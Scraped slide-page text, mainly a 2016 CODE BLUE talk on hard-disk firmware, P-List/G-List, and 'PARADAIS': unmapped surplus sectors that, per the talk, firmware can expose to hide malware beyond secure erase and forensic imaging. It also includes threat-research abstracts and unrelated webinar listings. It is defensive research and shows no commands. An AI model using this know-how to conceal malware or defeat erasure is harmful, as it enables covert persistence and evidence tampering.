Yuuma Taki is enrolled in the Hokkaido Information University Information Media Faculty of Information Media (4th year).
At university he is focusing on learning about security for lower-level components, such OS and CPU. In his third year of undergraduate school, he worked on trying to implement the OS security mechanism "KASLR", at Sechack365.
Currently, he is learning about ROP derivative technology and embedded equipment security.
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
In October 2021, we published the first analysis of Wslink – a unique loader likely linked to the Lazarus group. Most samples are packed and protected with an advanced virtual machine (VM) obfuscator; the samples contain no clear artifacts and we initially did not associate the obfuscation with a publicly known VM, but we later managed to connect it to CodeVirtualizer. This VM introduces several additional obfuscation techniques such as insertion of junk code, encoding of virtual operands, duplication of virtual opcodes, opaque predicates, merging of virtual instructions, and a nested VM.
Our presentation analyzes the internals of the VM and describes our semi automated approach to “see through” the obfuscation techniques in reasonable time. We demonstrate the approach on some bytecode from a protected sample and compare the results with a non-obfuscated sample, found subsequent to starting our analysis, confirming the method’s validity. Our solution is based on a known deobfuscation method that extracts the semantics of the virtual opcodes, using symbolic execution with simplifying rules. We further treat the bytecode chunks and some internal constructs of the VM as concrete values instead of as symbolic ones, enabling the known deobfuscation method to deal with the additional obfuscation techniques automatically.
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
Kimsuky is a North Korean APT possibly controlled by North Korea's Reconnaissance General Bureau. Based on reports from the Korea Internet & Security Agency (KISA) and other vendors, TeamT5 identified that Kimsuky's most active group, CloudDragon, built a workflow functioning as a "Credential Factory," collecting and exploiting these massive credentials.
The credential factory powers CloudDragon to start its espionage campaigns. CloudDragon's campaigns have aligned with DPRK's interests, targeting the organizations and key figures playing a role in the DPRK relationship. Our database suggested that CloudDragon has possibly infiltrated targets in South Korea, Japan, and the United States. Victims include think tanks, NGOs, media agencies, educational institutes, and many individuals.
CloudDragon's "Credential Factory" can be divided into three small cycles, "Daily Cycle," "Campaign Cycle," and "Post-exploit Cycle." The"Daily Cycle" can collect massive credentials and use the stolen credentials to accelerate its APT life cycle.
In the "Campaign Cycle," CloudDragon develops many new malware. While we responded to CloudDragon's incidents, we found that the actor still relied on BabyShark malware. CloudDragon once used BabyShark to deploy a new browser extension malware targeting victims' browsers. Moreover, CloudDragon is also developing a shellcode-based malware, Dust.
In the "Post-exploit Cycle," the actor relied on hacking tools rather than malicious backdoors. We also identified that the actor used remote desktop software to prevent detection.
In this presentation, we will go through some of the most significant operations conducted by CloudDragon, and more importantly, we will provide possible scenarios of future invasions for defense and detection.
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
Social media is no doubt a critical battlefield for threat actors to launch InfoOps, especially in a critical moment such as wartime or the election season. We have seen Bot-Driven Information Operations (InfoOps, aka influence campaign) have attempted to spread disinformation, incite protests in the physical world, and doxxing against journalists.
China's Bots-Driven InfoOps, despite operating on a massive scale, are often considered to have low impact and very little organic engagement. In this talk, we will share our observations on these persistent Bots-Driven InfoOps and dissect their harmful disinformation campaigns circulated in cyberspace.
In the past, most bots-driven operations simply parroted narratives of the Chinese propaganda machine, mechanically disseminating the same propaganda and disinformation artifacts made by Chinese state media. However, recently, we saw the newly created bots turn to post artifacts in a livelier manner. They utilized various tactics, including reposting screenshots of forum posts and disguised as members of “Milk Tea Alliance,” to create a false appearance that such content is being echoed across cyberspace.
We particularly focus on an ongoing China's bots-driven InfoOps targeting Taiwan, which we dub "Operation ChinaRoot." Starting in mid-2021, the bots have been disseminating manipulated information about Taiwan's local politics and Covid-19 measures. Our further investigation has also identified the linkage between Operation ChinaRoot and other Chinese state-linked networks such as DRAGONBRIDGE and Spamouflage.
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
Malwares written in Go is increasing every year. Go's cross-platform nature makes it an opportune language for attackers who wish to target multiple platforms. On the other hand, the statically linked libraries make it difficult to distinguish between user functions and libraries, making it difficult for analysts to analyze. This situation has increased the demand for Go malware classification and exploration.
In this talk, we will demonstrate the feasibility of computing similarity and classification of Go malware using a newly proposed method called gimpfuzzy. We have implemented "gimpfuzzy", which incorporates Fuzzy Hashing into the existing gimphash method. In this talk, we will verify the discrimination rate of the classification using the proposed method and confirm the validity of the proposed method by discussing some examples from the classified results. We will also discuss issues in Go-malware classification.
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
Malware analysts normally obtain IP addresses of the malware's command & control (C2) servers by analyzing samples. This approach works in commoditized attacks or campaigns. However, with targeted attacks using APT malware, it's difficult to acquire a sufficient number of samples for organizations other than antivirus companies. As a result, malware C2 IOCs collected by a single organization are just the tip of the iceberg.
For years, I have reversed the C2 protocols of high-profile APT malware families then discovered the active C2 servers on the Internet by emulating the protocols. In this presentation, I will explain how to emulate the protocols of two long-term pieces of malware used by PRC-linked cyber espionage threat actors: Winnti 4.0 and ShadowPad.
Both pieces of malware support multiple C2 protocols like TCP/TLS/HTTP/HTTPS/UDP. It's also common to have different data formats and encoding algorithms per each protocol in one piece of malware. I'll cover the protocol details while referring to unique functions such as server-mode in Winnti 4.0 and multiple protocol listening at a single port in ShadowPad. Additionally, I'll share the findings regarding the Internet-wide C2 scanning and its limitations.
After the presentation, I'll publish over 140 C2 IOCs with the date ranges in which they were discovered. These dates are more helpful than just IP address information since the C2s are typically found on hosted servers, meaning that the C2 could sometimes exist on a specific IP only for a very limited time. 65% of these IOCs have 0 detection on VirusTotal as of the time of this writing.
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware. It is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually actively develop tools and build analysis systems. On the other hand, it costs a lot for such tool developments and system maintenance. Incident trends change daily, and malware keeps evolving. However, it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, and it results in reducing their time for necessary analysis of new types of malware.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensic on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
[CB16] EXOTIC DATA RECOVERY & PARADAIS by Dai Shimogaito
1. @ CODEBLUE 2016 on Thu 20 Oct 2016
DAI SHIMOGAITO
OSAKA DATA RECOVERY ( daillo,inc. )
2. Who is Dai Shimogaito ?
Dai Shimogaito is a Japanese ,
Data Recovery Engineer – Retrieving data from computer crash
Digital Forensic Investigator – Examining digital evidences
Cyber Security Researcher – On hidden data area in HDD
h t t p s : / / w w w . f a c e b o o k . c o m / d a i . s h i m o g a i t o
6. 1. DISK
1 2
3
This circle flat disk like a mirror is
the data recording DISK.
This part holds DATA and Firmware.
7. 3
Read and Write HEAD is located at
the tip of the black rectangle part,
SLIDER.
2. Head Stack Assembly ( HSA, Head )
2
8. Main Controller and ROM are located.
Rom contains the 1st part of firmware.
Data port
Power port
RAM
3
3. PCB ( Printed Circuit Board )
9. Firmware is the implemented software for controlling
the movement of DISK and HSA to Read/Write data.
ROM contains the starting part of the firmware.
DISK contains the rest of the firmware.
4. Firmware
4
10. SA and UA
SA Service Area
Most of the firmware ( SA modules ) is stored
UA User Area
User data such as operating system, pictures,
and document files and directories are saved
Spare sectors are here
11. SA and SA Module
SA Service Area
Most of the firmware ( SA modules ) is stored
SA Module
Each module has its own function as firmware
such as P-List, G-List, S.M.A.R.T. and ATA-PW.
The number of SA modules differes depending
on the design of the product
12. 1. Power ON
2. Controller reads ROM
3. Disk spins up and Head moves to SA
4. Controller reads SA Modules
5. Ready
What happens during HDD booting
13. What happens during HDD booting
SA ModuleROM SA Module SA ModuleSA Module SA Module SA ModuleSA Module SA Module SA Module
Power ON Ready
SA Module
RAM
Controller
14. What happens during HDD booting
Power ON Ready
RAM
Controller
Power ON Not Ready
RAM
Controller
The cause could be,,,,
1. Head is bad for reading the SA Module
2. Disk area for the SA Module is bad
3. The content of the SA Module is bad
Operating System not found
Impossible
to access
any data
15. Internal Sector Location Management
Head 0
Head 1
Which Cylinder ( = Track ) ?
Which Head ( = Surface ) ?
Which Sector ?
By CHS, the physical location of a sector inside the HDD can be specified.
PBA ( Physical Block Address ) is assigned to each physical sector.
PBA 0 = CHS( 0 , 0 , 0 )
PBA 1 = CHS( 0 , 0 , 1 )
PBA 2 = CHS( 0 , 0 , 2 )
PBA 3 = CHS( 0 , 0 , 3 )
PBA 4 = CHS( 0 , 0 , 4 )
PBA 5 = CHS( 0 , 0 , 5 )
,
PBA 10 000 000 = CHS( 234 , 1 , 18 )
PBA 10 000 001 = CHS( 234 , 1 , 19 )
PBA 10 000 002 = CHS( 234 , 1 , 20 )
PBA 10 000 003 = CHS( 234 , 1 , 21 )
PBA 10 000 004 = CHS( 234 , 1 , 22 )
PBA 10 000 005 = CHS( 234 , 1 , 23 )
,
Sector is specified by
PBAinstead of LBA
inside HDD
* The values are not actual information. This is an example.
17. Physical sectors & LBA / ! misunderstanding !
Total number of physical sectors are equal ?
Physical sector to which LBA is not mapped
18. Physical sectors & LBA / ! misunderstanding !
LBA is mapped to all the physical sectors ?
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped
19. Physical sectors & LBA / ! misunderstanding !
NO !
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped
20. Total Number of Physical Sectors differs HDD to HDD
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped
HDD-A
HDD-B
HDD-C
PHASE-01
21. Primary Defects on Disk ( P-List )
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
List of the location information of is called "P-List"
P-List ( Primary Defects List )
P-List is saved in SA as an SA Module
P-List is unique and essential part of firmware
HDD-A
HDD-B
HDD-C
PHASE-02
22. At the time of Factory Shipment
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Equal Number of LBA are mapped to each HDD
so that the capacity would be the same
HDD-A
HDD-B
HDD-C
PHASE-03
23. Focus on LBA mapped sectors distribution
Accessible sectors are physically NOT continuous from the 1st LBA to the last LBA
HDD-A
HDD-B
HDD-C
PHASE-04
24. Total number of LBA are equal to each HDD
Accessible sectors are physically NOT continuous from the 1st LBA to the last LBA
On the contrary, accessible sectors are logically continuous from the 1st LBA to the last LBA
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-04PHASE-05
25. Let's see how Bad Sectors appear
At the time of Factory Shipment
Mint Condition
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
HDD-A
HDD-B
HDD-C
PHASE-03
26. Bad Sectors after Bad Sector Reallocation
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation
List of the location information of is called “G-List"
G-List ( Growth Defects List )
G-List is saved in SA as an SA Module
G-List is unique and essential part of firmware
After G-List is cleared, past data may appear.
HDD-A
HDD-B
HDD-C
PHASE-06
27. Bad Sectors after Bad Sector Reallocation
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-06PHASE-07
28. Possible to access bad sectors only by E-SE
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Q1.
Can we access the LBA
mapped physical sectors ?
Q2.
Can we access the Bad
Sectors, after bad sector
reallocation, to which
LBA is not mapped ?
A1.
YES
A2.
Basically
NO
but Enhanced Secure Erase
can access exceptionally
for trying to erase data
PBA LBAFirmware
Bad sector after bad sector reallocation
PBA Firmware LBA
HDD-BHDD-BPHASE-08PHASE-07
29. Comparison of 3 data erase methods for HDD
Secure Erase
( ATA Command / Purge )
Enhanced Secure Erase
( ATA Command / Purge )
Data Erase Software
( Overwrite / Clear )
&
One and Only method
which may erase the
Largest data area
Limited to the
LBA mapped area
Limited to the
LBA mapped area
or less
Physical sector to which LBA is mapped Bad sector after bad sector reallocation
Shown only the physical sectors which may be erased ( accessed ) by each method
HDD-B
HDD-B
HDD-B
PHASE-08
PHASE-08
PHASE-07&08
30. Comparison of 3 data erase methods for HDD
Physical sector to which LBA is mapped Bad sector after bad sector reallocation
Secure Erase
( ATA Command / Purge )
Enhanced Secure Erase
( ATA Command / Purge )
Data Erase Software
( Overwrite / Clear )
&
One and Only method
which may erase the
Largest data area
Limited to the
LBA mapped area
Limited to the
LBA mapped area
or less
All the physically existing sectors are shown
Physical sector to which LBA is not mapped Physical sector to which factory has skipped mapping LBA
HDD-B
HDD-B
HDD-B
PHASE-06
PHASE-06
PHASE-06
31. Survey of total physical sectors in 3 HDDs
2TB SATA HDD * 3
Same model, Same capacity
( Capacity:3 907 029 168 LBA )
HDD-A HDD-B HDD-C
Total PBA 3 931 988 368 3 933 712 984 3 933 659 976
Difference from
LBA
24 959 200 26 683 816 26 630 808
Difference in
Bytes
12 779 110 400 13 662 113 792 13 634 973 696
Difference in % 0.635% 0.678% 0.677%
( Total PBA) - ( Total LBA ) = Difference = Surplus Physical Sectors
32. Survey of total physical sectors in 3 HDDs
Surplus Physical Sectors are inaccessible,
because LBAs are not mapped to them
PBA Firmware LBA
What if there is DATA ?
36. Firmware defines the appearance of DATA
LBAPBA Firmware
1
LBAPBA Firmware
2
Firmware 1
Physical location of MBR ( LBA 0 ) may even differ depending on the firmware
Firmware 2
LBA is NOT always mapped to the same PBA forever. It's UNSTABLE !
HDD-B
HDD-B
HDD-B
PHASE-08
PHASE-14
PHASE-01
37. P A R A D A I S
When LBAs are mapped to the surplus physical sectors, they become accessible
despite they used to be inaccessible even by enhanced secure erase.
1. It may remain even after initializing and formatting.
2. It may remain even after OS installing / reinstalling.
3. Malware may preexist but no way to detect.
4. Inaccessible by conventional methods.
5. Any software and data may be stored.
6. There is no restriction.
7. Whatever you want.
8. Free space FOR "SOMEONE" LBAPBA Firmware
?
▼
HDD-BPHASE-10
38. 3 year old HDD may look like these
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation
HDD-A
HDD-B
HDD-C
PHASE-06
39. PARADAIS
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-06PHASE-09
40. PARADAIS
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation PARADAIS
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-06PHASE-10
41. PARADAIS
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation PARADAIS
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-06PHASE-11
42. PARADAIS
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation PARADAIS
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-06PHASE-12
43. PARADAIS
Physical sector to which LBA is not mapped Physical sector to which LBA is mapped Physical sector to which factory has skipped mapping LBA
Bad sector after bad sector reallocation PARADAIS
HDD-A
HDD-B
HDD-C
HDD-A
HDD-B
HDD-C
PHASE-06PHASE-13
44. Are these physically acquired disk images ?
Could be, but not always.
HDD-A
HDD-B
HDD-C
PHASE-05
45. These have been missed by disk imaging tools
HDD-A
HDD-B
HDD-C
46. PARADAIS Activation
PARADAIS can be activated either by external or internal trigger.
1. External Activation
When a certain ATA command is sent to HDD, PARADAIS may become ready to be activated
for the next power ( boot ) session.
2. Internal ( Self ) Activation
Without any external trigger, it may be activated. Just wait until it gets activated, someday.
This trigger works for offline PCs, therefore the activation may occur even in
air-gapped control systems.
▲
Manipulating /etc/shadow
for login to Debian Linux
as root
▲
/etc/shadow
Without external operation,
unidentified partition appeared
suddenly after reboot
47. PROBLEMS
Consumers & Users Vendors & Makers
You should be
responsible for the
accident !
I will sue you !
We had never
expected such
incident.
Product Liability
48. PROBLEMS
Court Judge
Are you sure ?
Law Enforcement
Your honor,
We've examined all the
data area of the HDD.
Physically extracted
image file is a perfect
copy of the HDD.
Digital Forensics
49. PROBLEMS
Victim Criminal
My data is gone,,,
Hostage for RANSOM
Your data is in your HDD,
but inaccessible for you.
If you pay me ransom,
your data would be back.
53. Solutions for PARADAIS activation
1. HDD inspection before use
The more critical the data is, the better it is to inspect the firmware of HDD before use.
Block the activation of PARADAIS even if there is unidentified data there.
To do so, firmware inspection would be useful to eliminate the activating mechanism.
Erase data on the surplus physical sectors.
To do so, first LBA mapping to the surplus physical sectors is required and then erase data.
2. Select reliable distribution channels
Who do you buy HDD from ? Why do you buy HDD from them ?
54. This research is goin on / Important Notice
Although I have described the mechanism of HDD and PARADAIS, it is unknown if
PARADAIS exists in all HDD products of all the manufacturers.
It could be possible that it exists only in several models that I have verified so far,
because the structure and the mechanism differ depending on the design of each
manufacturer and model.
To make it more precise and clear, it is preferable to explain on each different
product. However, it could affect the product's reliability. So I've been avoiding
mentioning the name of the products and the manufacturers so far.
I would appreciate your understanding.
このPARADAISがどのメーカーのどの製品にどの程度存在しうるのかについてはまだ調査の余地が残されており、H
DDはメーカごとの設計等によっても構造が異なるため、より具体的かつ正確性を確保するためには、各製品の設計
や仕様に沿った検証が本来ならば必要ですが、当研究の提言内容は、ともすれば特定のメーカや製品の信頼性に影響
を及ぼし兼ねないとの考えにより、積極的に特定のメーカ名や製品名を公表することは今の時点では控えております。
この点につきましてご理解を賜れますようお願い申し上げます。
59. The 1st step of the research completed with a good result
0.02%
94%
UP !
Newspaper : Nikkei Business Daily,
26th Septempber 2013
This was a joint research with Kansai University
and Osaka Data Recovery ( daillo,inc. )
61. Survey of 12 DR cases
No. Model Failure State
Difficulty
Level
After Cleaning by DDRH Effect
1 ST2000DM001 Unable to boot / Abrasion Powder B Improvement in serial port output C
2 ST2000DM001 Unable to boot / Abrasion Powder B Improvement in serial port output C
3 WD10EADS-22M2B0
Unable to boot / HSA Replacement /
FW Modification
D Read error partly solved B
4 SV1203N
Unable to boot / HSA Replacement /
FW Modification
C Read error solved B
5 ST3000DM001
Unable to boot / HSA Replacement /
FW Modification
C Improvement in serial port output C
6 ST2000DM001
Unable to boot / HSA Replacement /
FW Modification
B Improvement in serial port output C
7 ST2000DM001 Abrasion Powder a lot A No improvement D
8 ST1000DM003 Bootable E No change in serial port output D
9 ST3000DM001
Unable to boot / HSA Replacement /
FW Modification
C Read error partly solved C
10 ST31000528AS Unable to boot / FW Modification C Read error partly solved C
11 ST1000DM003
Unable to boot / HSA Replacement /
FW Modification
C Read error partly solved C
12 ST3000DM001 Unable to boot B Became bootable A
Difficulty Level
Disk surface totally turned into abrasion powder A
Disk Scratched Damage B
HSA Replacement and more processes required C
HSA Replacement required D
Minor Failure ( Part replacement not required ) E
Effect
Remarkable improvement A
Significant improvement *1 B
Improved C
No effect D
Became Worse E
This survey report was submitted to Osaka city
because the research and the development of
DDRH were partly funded by Osaka city subsidy
program in March 2016.
*1 More than 1000 read error sectors solved
62. Survey of 12 DR cases
Remarkable
improvement
8%
Significant
improvement
17%
Improved
58%
No effect
17%
Became
worse
0%
Disk surface totally turned
into abrasion powder
8%
Disk Scratched
Damage
34%
HSA Replacement
and more processes
42%
HSA
Replace
8%
Minor
failure
8%
Difficulty Level of Data Recovery Cleaning Effect by DDRH
Disk surface cleaning worked for approx. 80% of the DR cases.
63. Ongoing Research
FIRMWARE & PARADAIS
Bad
Lubricant Layer &
Disk Surface Cleaning
Good
Thank you very much for attending this lecture !